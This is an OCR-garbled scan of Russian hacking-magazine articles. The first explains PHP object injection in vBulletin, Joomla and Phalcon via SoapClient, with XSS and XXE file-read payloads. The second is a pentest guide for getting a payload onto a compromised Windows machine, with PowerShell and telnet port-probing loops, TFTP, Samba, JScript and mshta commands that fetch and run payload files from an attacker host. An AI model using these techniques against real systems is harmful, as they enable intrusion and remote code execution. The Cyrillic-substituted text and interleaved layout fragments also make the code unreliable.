В сложных современных веб-приложениях без объектно- 
ориентированного подхода просто не обойтись, поэтому 
очень часто можно встретить деструкторы классов, кото- 
рые выполняют действия для выгрузки объекта. Например, 
класс взаимодействия с базой данных закрывает соедине- 
ние, класс кеша может удалять временные файлы. Именно 
в деструкторах таится главная опасность для разработчиков, 
которые зачастую не учитывают, что при десериализации 
возможна подмена свойств объекта на произвольные зна- 
чения. Многие популярные веб-приложения были затронуты 
РНР Оес{ тесчйоп, в их числе шмзюп Ро\мег Воага, Чоопта 
и уВийЙейт. 

В последней версии уВий&т я обнаружил любопытный 
ип5епа!|те(). Он показал, что полезными могут оказаться 
не только _ ммакеир() и _ Че$гис\(), все зависит от того, ка- 
кие данные ожидает веб-приложение после десериализации 
данных. И более того, необязательно ориентироваться только 
на собственные классы приложения, ведь есть и внутренние 
классы РНР, речь о которых пойдет ниже. 


СМОТРИМУВОСЕТМ 

В плане безопасности популярный форум мВий!ейп знал луч- 
шие годы. В пятой версии «вобла» еще дальше ушла от про- 
стого форума и стала громоздким комьюнити-комбайном. 
Ради праздного интереса я открыл папку соге (которая, 
к слову, не защищена .Массе$$), где в инклудах обнаружил 


В современных веб-приложениях без объ- 
ектно-ориентированного подхода просто 
не обойтись, поэтому очень часто можно 
встретить деструкторы классов, выпол- 
няюшие действия для выгрузки объекта 


бо Взлом 


исходники Араспе [094рйр. Данный 
фреймворк — удобный инструмент 
логирования в РНР и используется > 
в таких проектах, как ЗидагСВМ, 
уНадеги СМ$ Маае Эитр/е. Но если 
в этих веб-приложениях от |094рИр 
остался только основной Ффунк- 
ционал, то в Вий!ейп обнаружил- 
ся полный код фреймворка, в том 
числе доступная из веба папка 
с примерами использования лог- 
фреймворка. Один из скриптов 
оказался крайне любопытным: 
при обращении к нему на порту 
4242 запускался сервер, который 


[осаВо$Е 


при получении данных пытался их | Рогмагд || Огор 


десериализовать. Так как полез- 
ных магических методов в |1094рйр 
найти не удалось, было решено 
обратиться к классам РНР. С помо- 
щью следующего скрипта я полу- 
чил список всех магических мето- 
дов в объявленных классах: 


<?рПр 
$с1аз5е5 = реф дес1аге_с1а$з5е5(); 
Рогеасв($с1аз5е5 аз $с1а$$) { 
фтеЕпоЧ$ = реф с1а55_тефпо4$ ($с1аз$5); 
фогеасй ($тефНо@$ аз $меЕНоа) { 
1+ (1п_аггау($тефжпоЯ, аггау("'__ае$%гисЕ"' ‚+= 


'_ Фо5фи1иР', '_ маКеир", "_ са11', == 
'_ са115$Фа*1с', '_ вее', '__5е®', ++ 
'_155е*', '_ ипзее', '_ 1иуоКе', ++ 
'_еф $факе’))) { 

рг1и{ $с1аз5 . '::' . фтежпоЯа . "\п"; 


} 


Список получился объемным, но, как оказалось, почти все 
классы не позволяли сериализацию либо были бесполезны- 
ми. Внимание привлек класс ЗоарСйет и его метод __са!(), 
который вызывается, если попытаться вызвать несуществую- 
щий метод. Это как раз то, что нужно, ведь в уязвимом скрип- 
те после преобразования данных в объект вызывался метод 
деВоо!осдоадег(). Класс ЗоарСйет имеет множество свойств, 
а при вызове несуществующего метода он позволяет отправ- 
лять ЗОАР-запросы на произвольные адреса. Уже интересно, 
посмотрим, что можно из этого выжать. 


$ОАРСЫЕМТ 

Конструктор класса ЗоарСйептГ принимает два аргумента: 
адрес \М5ОЁ-документа в формате ХМЕ, описывающий ЗОАР- 
интерфейс, а также массив опций. Если передать в каче- 
стве $\/54! значение МИЦ, то объект будет инициализирован 
в поп-М/ЗОЕ режиме. Проблема в том, что при режиме с \М/ЗО1- 
документом класс не предусматривает нормальной сериализа- 
ции свойств, а вот с поп-\\/ЗОЕ все в порядке. Поэтому остает- 
ся один вариант с $5 Ч!=пи! и ограниченным набором опций. 
Но даже с тем, что было доступно, получилось довольно много. 
Начнем с банальной Х$$’ки, конструируем следующий объект 
ЗоарС!егт: 


<?рПр 
с = пем боарс11еп* (пи11, агга 


МРТ = 


Конструктор класса $оарСПепЕ принимает 
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Лоопта 3.0.2 


Ведие$! {о НИр:/Лосаюо$:8080 [127.0.0.1] 
| М\егсер в оп | АСНОП | 


ХХЕ через ип5епайте 
в уоопа 


Быстрый РНР- 
фреймворкРвВа!соп, 
написанныйнаС 


два аргумента: адрес \7$ОТ-документа 
в формате ХМГ, описывающий $ОАР- 
интерфейс, а также массив опций 


; Ум затрю 


"Ир: // е5%.сом/", "'ТосаЕ1оп' => 
"ИЕЕр: //Фез{.сот/ар1.рИр')); 


Контролируемый нами скрипт ар!.рпр отдает НТТР-ответ 
с кодом 404: 


<?рИр 
пеадег ("НТТР/1.0 404 <5сг1рЕ>а1ег{(1)</зсг1ре>"); 


Вместо статус-сообщения «Мот РЕоипа» ар!.рйр отправляет 
произвольную строку, ЗоарСИет видит код 404, генерирует 
исключение ЗоарЕРаий, сообщая о том, что удаленный ресурс 
не найден, и возвращает нашу строку в тело ответа. 

Одна из возможностей ЗоарСИеп{ — локальное кеширова- 
ние М/О! -документа. Хотя это не помогло бы эксплуатации РНР 
ОБес{ шесйоп в уВиЙейп, все же стало интересно, как это де- 
лает ЗоарС!ег\. Оказалось, что документ сохраняется без вся- 
ких проверок соответствия пути директиве конфигурации РНР 
ореп_рБазеа!, которая запрещает файловые операции вне ука- 
занного каталога: 


<?рИр 
111_зе*('‘ореп_Базед1г', '/маг/ммм'); 
111 5е%('5оар.м541_сасйе_епаб1еа', гие); 
111 _5е{('5оар.м$а1_сасйе_41г', '/&тр'); 
с = пем боарсС11епт*(' Ир: //ез®. сот/е5*.м5а1' 
аггау ( 'сасйе_мза1' => М5О1_САСНЕ_ОТУК)); 


Итак, нужно было что-то более интересное, чем просто Х55. 
Почему бы не ХХЕ, ведь ЗОАР работает с ХМЕ? И действитель- 
но, ЗоарС!ет был уязвим перед внедрением внешних ХМИ- 
сущностей, даже несмотря на то, что при попытке парсинга 
ООСТУРЕ сообщал, что он не поддерживается! Дело в том, 
что исключение вызывалось уже после обработки ОТО, а в ис- 
пользуемом ХМ!-парсере МБХМЁЕ опция обработки внешних 
сущностей включена по умолчанию. Никакого вывода сущно- 
стей добиться не удалось, однако помогло замечательное ис- 
следование реализации ХХЕ через внешние каналы связи моих 
коллег Алексея Осипова и Тимура Юнусова. Техника позволя- 
ет отправлять содержимое файла через НТТР-запросы пря- 
мо в запрашиваемом пути. А вместе с разнообразными РНР- 
обработчиками схем удалось добиться чтения любых файлов. 
В этом помог враппер рйр:// и фильтр БазебА: 


рир: //Я1ег/геад=сопуег* .Базеб4-епсоде/гезоигсе=«= 
/[ефс/ра$$ма 


Итак, эксплуатация РНР ОШес шесйоп через внутренний 
класс РНР оказалась успешной. Помимо уВийЙейп, данный век- 
тор будет работать в Чоот!а <=3.0.3, где через ипзепа!7те() воз- 
можна 5О!-инъекция и удаление произвольной директории. 
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Вполне очевидно, что не всегда можно встретить вызов ме- 
тода на десериализованном объекте, и, к сожалению, в классах 
РНР нет ни одного деструктора, который брал бы из свойства 
объект и пытался выполнить у него какой-либо метод. Если об- 
ратиться к популярным компонентам, то одним из самых под- 
ходящих будет шаблонизатор Этаму. В нем можно встретить 
следующий код: 


<?рИр 
риуб11с ФипсЕ1оп __дезгис*() 


{ 


1+ ($%01$->5таг®у->сасВе_ТосК1пе && «+ 
155е1 ($%11$->сасйеа) && $+01$->сасНед- >= 
15 _Лоскеа) { 
$115 ->сасйед- >Папа1ег->ге1еазе!осК+= 
($Е115$->°тагеу, $ЕН1$5->сасйеа); 


Если поместить в свойство Нап ег наш объект ЗоарСйет\, 
то операции над объектом в коде веб-приложения не потре- 
буются и ХХЕ будет проэксплуатирована автоматически через 
метод _ ае$гис((). 


МНАТ”$ МЕХТ? 

В РНР 5.5 намечается нововведение в функции ипзепай7е(), 
а именно второй аргумент, который позволит разработчикам 
запретить обработку объектов либо указать белый список раз- 
решенных. В настоящее время используются регулярные вы- 
ражения, которые зачастую можно легко обойти, либо данные 
не проверяются вовсе. Например, в пмзюп Ромег Воага <= 
3.3.4 была вот такая смешная проверка: 


$ уа1че = $ СООКТЕ[_1р$Вев15*гу: : $5е1п25+= 
['соок1е_14а'].$пате ]; 
1+ ( зи65Е"( $ ма1че, 0, 2 ) == 'а:') { 

гетигп ип5ег1а117е(_ ${г1р$1азПе$(_ иг1аесоде‹= 


($ уа1че ) )); 


} 


В строке проверяются первые два символа: если это 
«а:», то есть сериализованный массив, то строка попадает 
в ипзепайе(). Однако атакующему ничто не мешает отправить 
массив объектов, что приведет к обходу проверки. 

Говоря о будущем РНР ОЩест шесйоп, стоит расска- 
зать о РНР-фреймворке следующего поколения под именем 
Рпасоп, который становится все более популярным у веб- 
разработчиков. Весь его код написан на чистом С, что дела- 
ет его самым быстрым РНР-фреймворком. Рпасоп реали- 
зован в качестве расширения РНР соответственно, требует 
компиляции и включения в конфигурацию РНР При этом все 
классы фреймворка становятся доступными в контексте 
веб-приложения без каких-либо инклудов внешних файлов. 
Если представить зпагед-хостинг, у которого Рпа|соп включен 
для всех пользователей по умолчанию, то очевидно, что это 
позволит использовать классы фреймворка через ипзепайхте(), 
даже если уязвимое веб-приложение написано не на его базе. 
Я решил проверить, возможна ли эксплуатация ипзепайхе() че- 
рез классы Рпа[соп, и оказалось — очень даже просто! 


РНАЕСОМ 
Получив магические методы из всех классов фреймвор- 
ка, я не нашел ни одного деструктора, но обнаружил один 
_ макечри): 


<?рИр 
РНР_МЕТНОО (Рпа1соп_Гозвег_Адарег_Е11е, __макКецр) { 
7\а1 *рафй, *ор{1оп$, *то4е = МОЁ, *В1е_Папа1ег; 


РНАЕСОМ_ММ_бВОМ(); 


РНАЕСОМ_ОВ$_\АВ (ран); 
рпа1соп_геаЯ_ргорег%у_1115$+ = 
(&раЕИ, 1115 рег, 51(" рай"), РН _МОТ$У_СС); 


РНАЕСОМ_ОВ$_\МАВ (ор 1оп5) ; 


Старый новый ипзепа!те 
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ВРНР 5.5 намечается нововведение в функ- 
ции ипзепай2е(), а именно второй аргу- 
мент, который позволит разработчикам 
запретить обработку объектов либо ука- 
зать белый список разрешенных 


У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 


ВСЕ спомощью 
классов фреймворка 
Рвасоп 


стае ВаЕеЕееО" се троне 


И Е 


Ва1соп_геад_ргорегЕу 111$ (&ор{10п$, <= 

{01$ рег, 51(" орЕ10оп$5"), РН _МОТ$У_ СС); 

1+ (рйа1соп_аггау_1$5е%_$%г1п8(ор{10п$, «= 

55 ("тоае"))) { 
РНАЕСОМ_ОВ$_\МАВ (тоае); 
рпа1соп_аггау_Фефсй_$г1 пе ( &тоде, орЕ1о0п$, «= 
5 ("тоае"), РН _МОТ$У_СС); 

} е15е { 
РНАЕСОМ_ТМТТ_М\УАВ (то4е) ; 
1\АЕ_$5ТВТМ№  (то4е, "аб", 1); 


} 


// Ве-ореп Пе #1е Папд1ег 1+ {Пе 1о5вег ма$ 
// зег1а11теа 

РНАЕСОМ_ТМТТ_\АК (В1е_Папа1ег); 

РНАЕСОМ_САЕЕ _РОМС_РАВАМ$_2(#1е_Папа1ег, ‹ 
"Гореп", раЕИ, тоае); 
рпа1соп_ирда*е_ргорегу_ 111$ (%11$_рЕг, «= 
5Е(" #1еНапа1ег"), #1е_Папа1ег ТУКМЕ$_СС); 


РНАЕСОМ_ММ_ВЕЗТОВЕ (); 


Данный код получает из ргщецеа-свойства _ра{й путь и от- 
крывает его функцией Тореп() в режиме, передающемся в свой- 
стве _ор#оп$. С помощью данного кода можно открыть тысячи 
файлов и забить все дескрипторы, но это неинтересно. Но что, 
если поместить в _раЙ объект? При вызове Юреп() он будет 
преобразован в строку, за что отвечает магический метод 
_ оЗипо(). А вот этот метод Рпасоп использует очень широ- 
ко. Я не буду описывать все внутренности фреймворка, скажу 
лишь, что в одном из _ 105п9() удалось добиться инициали- 
зации произвольных объектов и вызова любых методов. Уже 
на этом этапе можно подсунуть наш ЗоарС!ещ и провести ХХЕ, 
но ВСЁ всегда лучше! Пробежавшись по исходникам на пред- 
мет вызова функции рпа|соп_гедиие (инклудит файлы так же, 
как и геаийе в РНР), я обнаружил класс \Рпасоп\Мус\Мем\ 
Епоте\Рир, в котором метод гепаег позволяет инклудить про- 
извольные файлы. Таким образом, через __макеир() удалось 
вызвать _ фо под, а через него — подключение произвольных 
файлов. Видеодемонстрацию смотри на диске. 


ЕМ 

РНР Обес{ песйоп все еще жив и будет жить. Вместе с «без- 
опасной» версией ипзепайте() в РНР 5.5 появится много новых 
классов, и, возможно, не без уязвимостей. Так что смотрим 
в будущее! 2= 
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Заливаем полезную нагрузку на машину под управлением УЛпдо\/$ 


Как правило, большие и средние компании строят свою инфраструктуру на решениях МсгозоН. 
В основном это парк машин на ХР/7, состоящих в домене с функциональным уровнем леса — 
\ММпаом/$ Зегуег 2003. Периметр и демилитаризованные зоны часто представлены *тх-ПКе систе- 
мами. В нашем распоряжении есть лишь минимальный набор инструментов, немногим варьиру- 
ющий от версии к версии ОС, который позволяет в полной мере выполнить поставленную задачу. 


авайопределимсясситуацией — онабанальнаипо- 
вседневна для пентестера :). Имеется некий вектор 
атаки, позволяющий выполнять команды ОС. Сер- 
вер можетнаходиться напериметре, вдемилитари- 
зованнойзонеиливинтранете. Этиусловиянеприн- 
ципиальны. Чтобы было проще, давай введемтакие именования: 
. ТАВОЕТ — машина, на которой имеем выполнение команд, 
на базе \Мтпаом/$, у нее только один сетевой интерфейс, смо- 
трящий внутрь сети (192.168.1.10); 
САТЕ — шлюз, который связывает внутреннюю сеть и ин- 
тернет. Ось непринципиальна. Соответственно, на нем два 
сетевых интерфейса (192.168.1.1 и5.5.5.5); 
АТТАСКЕВН — наш подконтрольный сервер, на базе Вацгаск 
5г3 / Кай Мпих, с |Р-адресом 1.2.3.4. 


РААВЕМАЦ. НОГЕ$ 

Прежде чем начать передачу целевого файла, важно найти 
способ надежного соединения с узлом. Поиск прямых каналов 
связи на транспортном уровне с эксплуатируемым узлом (1Р: 
192.168.1.10) решается последовательным перебором пор- 
тов на контролируемом сервере (1Р: 1.2.3.4). Из стандартно- 
го инструментария можем воспользоваться Тете, пзюокКчр, 
Ромегэпе!. Тете и пзюоокир целесообразно использовать 
в версиях до \\Ипдом/$ 2003 включительно, а начиная с \ММпЧо\м/$ 
\М$а рекомендуется использовать Ромег®пей. В принципе, 
если бы не досадная ошибка в пзюокур, у нас мог бы быть 
универсальный инструмент для всех версий М/паом/5. Очевид- 
ный факт: если в системе нет Тете, то там есть Ромег5пей. 
Для того чтобы понять, когда именно к нам придет подключе- 
ние, запустим покорный {сраитр: 


фсрачтр позе 5.5.5.5 


В свою очередь, будем пробовать подключаться к нашему внеш- 
нему серверу с машины, на которой у нас выполнение команд. 
Для версий \\таом/$ <= М/паом$ 2003: 


ТСР-порты: 
РОК /Ё %1 1М№М (1,1,65535) 00 (ста /с "$ФагЕ /Б == 
фе]пе{ 1.2.3.4 #1") 


ЦОР-порты: 
РОК /Ё %1 1М№ (1,1,65535) 00 (ста /с "$агЕ /Б == 
п$100кир -рог{=%1 уа.ги 1.2.3.4") 


Для \ММпаом/$ За и более поздних версий винды будем ис- 
пользовать Ромег5Пей. 


Вячеслав Егошин 
@уедозйт, 
уедозпт@рзесиу.ги 


Стандартные 
настройки 


=\“>то4е СОН 


Адтипи5та!ог: Соттапа РухлрЕ - = хо 


ТСР-порты: 
КипсЕ1оп $Т($ТР,ФРог®) {$Адаге$$ = [зуз%ет.пе*. + 
ТРАЗаге$° ] : :Рагзе($ТР);$Еп = Мем-ОБб]есЕ $уз%ет. «= 
Мее.ТРЕпаРо1пЕ $аааге$$, $рог*;$5$а4даг+Р = [5уз%ет. «= 
Меф.5оске*$5 .АдагеЕат11у]: : Т"т®егМемогК ; = 
$5$уре = [5уз%ет.Ме*.ЗоскКе*$ .зоскееТуре]: : «= 
5Егеатм; $РЕуре = [5уз%ет.М№е* .5оске*$ .Ргофосо1Туре] : : «= 
ТСР;$5осК = М№ем-ОБ]есе 5Зуз%ет. Мет. Зоске*$.5оскее «= 
$заааг+, $зуре, $рЕуре;$5оск.ТТЁЕ = 26;гу «= 
{ $5осКк.Соппес* ($Епа) ; [Ву*е[]] $Меззаве = += 

спаг "иб0емо0те" ; $$еп{ = $5осК.5епа ($Меззавде) ; «= 
$зосКк.ЕпАСоппесе ($Соппес*)} сафсИи {};$5оскК. == 
С10$е();};1..65535 | %{ $Т -ШР "1.2.3.4" -Роге $_ } 


ООР-порты: 
КипсЕ1оп $0($ТР, [1п*]$Рог*){ФАдаге$$ = [зуз%ет. «= 
пе{.ТРАаагез° ] : :Раг5е($ТР);$Епа = М№ем-ОБуесе += 
буфет. Ме. ТРЕПаРо1п* ($Аддге$$, $роге);$5аааг+=«= 
[5узет.Ме{ф .боскеф$ .Аадге$$Рат11Ту]: : Тт®егМемогк ; == 
$5уре= [5уз+ет.Ме*.5осКеф$ .5оске*Туре] : :Озгат; «= 
$Реуре= [5уз+ет.Ме*.5оскКее$ .Ргофосо1Туре]: : ЦОР; «= 
$5оск=М№ем-ОБ]есЕ 5$уз%ет.Ме*.5оскее$ .5осКеЕе += 
$задаг+, $5%уре, $рфуре;$5осКк.ТТЁЕ = 26;$5$0сК. == 
Соппес* ($епа) ; $Епс= [5уз{ет. Тех. ЕпсоЧ1п8] : : += 
АЗСТТ; $Меззаве = "м00Еи90+" ; $ЗВиЕРег=$Епс .бе*Вуе$-= 
($Меззаре) ; $5еп*=$5осК .5епа ($Виег);}; 1..65535 |+ 
%{ $10 -ТР "1.2.3.4" -Рог* $_ } 


С сасиз Рок Чеолсе СОН: 


Со 1итпз 


Кеузоак кабе: 
Кеуроак4 ДЦе]ау: 


Со4е раде: 


>. 


$4 Взлом 


Естественно, куски этого кода необходимо заэнкодить 
в Вазеб4, после чего передавать полученное значение как ар- 
гумент к команде РомегЭпПе! с параметром -епсодеяаСоттапа. 

Также стоит упомянуть о таком проекте, как |етеошоТуоиг 
(БИ. У/1ЭВУЛВ) от @тибх для проверки доступных каналов во 
внешнюю сеть. На любой НТТР-запрос отвечает м 00\м00\. 


ЕТР 

Признан самым распространенным способом загрузки це- 
левого файла и вообще является одним из старейших про- 
токолов прикладного уровня. Основные достоинства загрузки 
через ЕТР — простота использования и наличие приложения 
во всех версиях систем. Если хост находится за МАТ, то в боль- 
шинстве случаев необходимо использовать режим работы 
разме тоае, иначе сервер не сможет подключиться к кли- 
енту. Существуют реализации расширений для МАТ и сетевых 
экранов, позволяющие клиентам работать в активном режи- 
ме, но это большая редкость и небезопасно. Стандартная 
функциональность позволяет указать любой порт удаленного 
сервера. 


ТЕТР 

Клиент ТЕТР реализован во всех версиях семейства \М/пао\$, 
но начиная с версии \\Мпао\ми$ \М$а отключен и не доступен 
по умолчанию. Особенность ТЕТР — он основан на транспорт- 
ном протоколе ЦОР. Зачастую при полной фильтрации ТСР уда- 
ется передать файл по ЧОР. Достаточно запустить сервис 


аЕРЕра --Чдаетоп --рогЕ 69 /%тр 


и выполнить на клиенте последовательность простых команд 


15т /оп11пе /епаб1е-Феафиге /Феаигепате : ТЕТР 
ЕРЕр -1 1.2.3.4 СЕТ рау1оа4.ехе 


ТЕСМЕТ 
Клиент Тепе! также реализован во всех версиях семейства 
\ММпао\м/$ и также отключен и недоступен начиная с версии 
\М/Мпаом/$ Ма. Задумывалось, что Тете будет использовать- 
ся для работы с протоколами уровня приложений. Клиент 
тоже поддерживает работу на транспортном уровне, правда 
с некоторыми особенностями, для нас не важными. Исполь- 
зование клиента Тепе{ в качестве транспорта для бинарных 
файлов невозможно из-за специфики протокола (более под- 
робно в ВЕС854 про <СА><1Е>). Поэтому без потерь можно 
передавать файлы, содержащие стандартный набор АЗСИ- 
СИМВОЛОВ. 

На сервере запустим пысаф, который будет передавать со- 
держимое нашего файла: 


пс -4а 20 -1\р 23 < е\11.Ба* 


МАТ Етемгай 
[2.5.5.55 
— 
53/4срореп 
53/иар ореп 


80 4срореп 


445 Аср 


|Р:192.168.1.10 


У\АВММС 


Информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 


Неправильная кон- 
фигурация сетевого 
экрана 


Рис О№$ 
|Р: 8.8.8.8 


АКаскег 
|Р: 1.2.3.4 
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На клиенте же, в свою очередь, заэнейблим Тете, если 
он отключен: 


Ч1зт /оп1]1пе /епаб1е-Реафиге /Реафигепаме : 
Те] пес] 1еп* 


и таким нехитрым способом подключимся к серверу и сохра- 
ним в файл то, что он нам передал: 


по4е сом сС01$=200000 && те1пеЁ 172.16.61.21 -Е «=: 
с: \ соттапа.Бае 


поае СОМ С01$=200000 устанавливает количество колонок 
(читай — символов), после которого клиент Тете{ добавит сим- 
волы <СВ><ЕЕР>. В принципе, если максимальная длина не пре- 
вышает настроек пез, то можно специально не задавать. 

Ключ -Г клиента Тете позволяет записывать {ат сессии 
в указанный файл. Кстати, так же можно использовать в *пх, 
если в наличии нет доступного инструмента. Обязательное ус- 
ловие успешной эксплуатации — наличие символов <СА><ЕЕ> 
в конце строки. Быстро сконвертировать файл, созданный 
в *пх, можно командой 


ип1х240$ е\11.Ба* 


$АМВА 
батра — свободное ПО, в серверной части которого реализо- 
вана работа с протоколом ЗМВ/СЕ$. СЕ$ — протокол уровня 
приложений для работы с файловой системой по сети. Рас- 
смотрим ситуацию, когда невозможно получить вывод команд, 
команды выполняются от непривилегированного пользователя, 
нет доступной для записи директории. В этом случае целесо- 
образно установить на контролируемом сервере (1Р: 1.2.3.4) 
службу Затра, настроить гостевую аутентификацию и разре- 
шить запись в директорию. 

Конфигурируем (/&с/затра/зтЬ.соптТ) и запускаем Затвра: 


[510оБа1] 
могК5ГгОИр = МОККСКОУР 


зесие1 у = паг 
пеЕб10$ = ТЕЗТ 


зегуег $%г1пв = ПН зегуег (батба, Убипфи) 


[зПаге] 

соттепе = Е11е 5$егуег 5Паге раЕИ = /&тр/зПаге «= 
Бгомзаб]е = уез мг1фаб]е = уез вчезе ок = уе$ += 
геаа оп1у = по сгеафе тазКк = 90755 


и запускаем сервис: 
$сиао зегу1се зшба $фаге 
После чего монтируем только что созданный ресурс как диск 


пеЕ ие Х: \\1.2.3.4 


и копируем необходимый файл 


сору Х: \рау1оа@.ехе С: \рау1оаа .ехе 


МИМОО\!$ ЗСЫРТНОЗТ 

Что это вообще такое? М/ЗН — автономный сервер, предна- 
значенный для выполнения сценариев на уровне ОС. Является 
встроенным компонентом и присутствует во всех версиях на- 
чиная с \ММпаом/$ 2000. По умолчанию интерпретирует два типа 
сценариев. Первый тип — автономные сценарии, реализован- 
ные на языках УВЗсир\//Зсиру. Как правило, файлы сценариев 
имеют расширения \6$, Бе и 5, |зе соответственно. Второй 
тип — файлы м/$т (М/паом/$ эсиру Ее). Это текстовый документ, 
содержащий код ХМИ. 


УВЗСЁЫРТ//$СЕЁРТ 

Скриптовые объектно-ориентированные языки программи- 
рования, интерпретируемые сервером \/таом5 ЗЭспирте Но. 
Серверов, кстати, два: сзсир{ — консольный и мизсирЕ — интер- 
активный. Сервер по умолчанию — м/зсирт. Эти языки создава- 
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лись для автоматизации рутинных действий, администриро- 
вания и обработки данных. Для доступа к элементам системы 
используют СОМ (Сотропепт ОЦЩес{ Моае!). Кстати, если собе- 
решься написать что-нибудь, при прочих равных условиях вы- 
бирай УЗсир\, так как он имеет приятный легко читаемый син- 
таксис и поддерживается многими ШЕ. К сожалению, передать 
скрипт как аргумент серверу \МЗН нельзя. Обязательно нужно 
указывать путь к сценарию. Процедура, реализующая получе- 
ние файла с НТТР/НТТР$: 


ФипсЕ1оп НТТРбеЕбомп1Тоаа (иг1, #1е) { 


// Создаем НТТР-объект 

уаг Ир = пем Ас&1уехоБесе-» 
("иИтиНнЕЕр .итиНЕЕрКеадче${.5.1"); 

// Обращаемся по указанному ЦВЕ 

ПЕЕр .ореп("бЕТ", иг1); 

ПЕЕр.5епа(); 

уаг $%геат = пем АсЕ1уехоОБЗес* ( "АБООВ .5Егеат") ; 
${геам.фуре = 1; 

${геат.ореп(); 

// Записываем получаемый поток данных 
// в целевой файл 

${геат.мг1е (ИЕЕр.гезропзеВоду ) ; 
${геат. замеТоЕ11е(#1е,2); 


НТТРбеебоипт1оаа( "Ир: //1.2.3.4/рау1оа4.ехе", «= 
"рау1оаа.ехе"); 


МАМООМ/$ СЕРТЕШЕ (\МЕ$) 
Сценарии \5Е могут одновременно содержать УЗсир- 
и \/ВЗсир1-сценарии. Это сделано для того, чтобы увеличить 
гибкость написания кода, атакже обеспечить модульность и по- 
вторное использование кода. 

Вот несколько набросков, которые реализуют передачу 
файла с различных ресурсов: 


> НТТР/НТТР$ 
<)о6><5сг1рЕ 1апвиаве="\/В$сг1ре" згс=" Ир: //= 
1.2.3.4:80/рау1оаа.м65"></5сг1р*></3о6> 


> ЕТР 
<)о6><5сг1ре 1апвичаве="\/В$ сг1ре" згс="4 р: / / «= 
1.2.3.4:21/рау1оаа .\м65"></5сг1р*></)оБ> 


> ЦМС 
<)о6><5сг1рЕ 1апвиаве="\/В$сг1ре" згс="\\1.2.3.4\+- 
рау1оаа . м6 5" ></зсг1р*></)оБ> 


На просторах Сети добрый китайский коллега 777Е\/А722 ре- 
ализовал скрипт Апу2Ва{ — любой файл путем преобразований 
можно сконвертировать в Ба+. Логика работы проста: создается 
файл — архив саб, преобразуется в Вазеб4 и оборачивается 
в\М/ЗЕ ВМ/ЗЕ содержится УВЗсирЪф, который читает себя как ХМЕ 
(как ранее было отмечено, \/ЗЕ описывается ХМИЕ), берет пер- 
вый элемент и сохраняет содержимое в саб. Полученный \М/Е 
преобразуется в Ба{ путем добавления к каждой строке «@еспо 
... > рауюаа4 м$Р». На основе скрипта 277Е\А72727 была реализова- 
на версия на Ромег5пей. Теперь можно конвертировать целевой 
саб в\/ЗЕ или ра{. Ее ты сможешь найти на нашем диске. 


М$УНТА 

М$зма.ехе (Мсго5ой НТМЕ АррИсайоп Но${) — служебная про- 
грамма для выполнения НТА (НТМЕ АррИсайоп$). НТА — это 
НТМЁ-страница, которая имеет доступ к ресурсам системы че- 
рез СОМ, выполняя скрипты УЗсирУИ\МВЗсиру. В принципе, это 
полноценный |щете Ехр/огег, только без зон безопасности. 
Таким образом, у нас есть возможность изменять реестр, ра- 
ботать с файлами и сетью. Утилита принимает один параметр 
командной строки — то, что попадет в Огом/ег аааге$$ Баг. По- 
этому мы можем передать ссылку на НТА или скриптовый блок. 
Расширение не имеет значения. Выполняем УВЗсирУ$сиру, 
расположенный на удаленном хосте: 


тифа ИЕр://1.2.3.4:80/рау1оаа.\мЬ$ 
тифа Ир$://1.2.3.4:443/рау1оаа. м5 


$5 


МАТ Етемгай 
1Р: 5.5.5.5 


\МАсит 
[Р: 192.168.1.10 


АНаскег 
|Р: 1.2.3.4 


| 
и 


Затра егмсе 
РАТН: \\1.2.3.4\ 


Монтирование удален- 
ного ресурса 


тзИфа +%р://1.2.3.4:21/рау1оаа .\6$ 
тзИфа \\1.2.3.4\рау1оаа.\6$ 


Выполняем УВЗспир\/УЗ сир: как аргумент запуска команды: 


тзИЖа мЬзсг1 ре: Ехесите ( "М$сг1ре.Есйо 1") 
тзИфа дауа$зсг1ре : Ехеси*е ( 'М5сг1ре.Есйо(1);') 


\МУЕВОАУ 

Протокол прикладного уровня, расширяющий возможности 
протокола НТТР/НТТР$ для удаленной работы с файлами. На- 
чиная с версии \М/пао\/$ ХР клиент \ММебОА\ реализован в виде 
службы \№\ебСйептт. Серверная часть представлена, как прави- 
ло, расширениями для Араспе и П$. \МебрА\, так же как и $МВ/ 
СЕ$, решает задачу с поиском папки для записи — расширение 
дискового пространства с правами на запись для группы «Все». 
По сравнению с ЗМВ/СЕ$ применение \\ебОА\ в некоторых 
случаях более гибкое, так как поддерживает работу по НТТР На- 
чиная с версии \\МИпаом/$ ХР $Р3З, а именно предустановленного 
апдейта КВ892211, появляется поддержка Э5Ё и возможность 
выбора произвольного порта. Более ранние версии \М/еврАУ 
пи!-гедпеог поддерживают работу исключительно по НТТР 
и 80-му порту. В корпоративных средах повсеместно распро- 
странена практика использования прокси-серверов в качестве 
шлюза в интернет. В тех случаях, когда другие способы не ра- 
ботают — нет поддержки прокси-сервера, целесообразно ис- 
пользовать \ММебОА\. 


РВОХУЗЕТТИМС$ 
Давай рассмотрим тему настройки прокси-сервера для поль- 
зователя. С точки зрения системного администрирования су- 
ществуют четыре возможных сценария предоставить пользова- 
телю настройки прокси-сервера: 
. \МРАО; 

РАС: 

Стоир ройсу; 

Озег спосе. 


М/РАБ 

\Меб Ргоху Ащо-О1$соуегу Ргдфосо! используется, если в на- 

стройках браузера активна Ащотайсу ащест зе то. 
Настраивается соответствующими записями на серверах 

ОМ$ или ОНСР. При получении настроек через ОМ$ должно 


56 Взлом 


соблюдаться условие публикации файла: только НТТР, толь- 
ко 80-й порт. В ОНСР может использоваться любой порт. 
Если ты смотришь на УВЕ настроек \М/РАВ и там использу- 
ется нестандартный порт, то знай, что настройки получены 
по ОНСР ;). 

Например, компьютер находится в домене г1.а2.рпдауз. 
сот. В поисках файла настройки браузер последовательно 
обращается к таким УРГ: 

. ПИр://мраа.г1.42.рпаау$.сот/мраа.аа{ 
. ПИр://мраа.а2.рпдау$.сот/мраа.Аа{ 
‚ Пр://мраа.рпаау$.сот/мраа.4а{ 

‚ ПИр://мраа.сот/мраа.Ча{ (ООООР$!) 


РАС 
Ргоху ащо сопйд — на практике \М/РАО — это и есть переиме- 
нованный файл с РАС. Если посмотреть код, то обнаружишь 
там уауиаЗсир{-функцию ЕтаРгохуРогУРВЕ, которая возвращает 
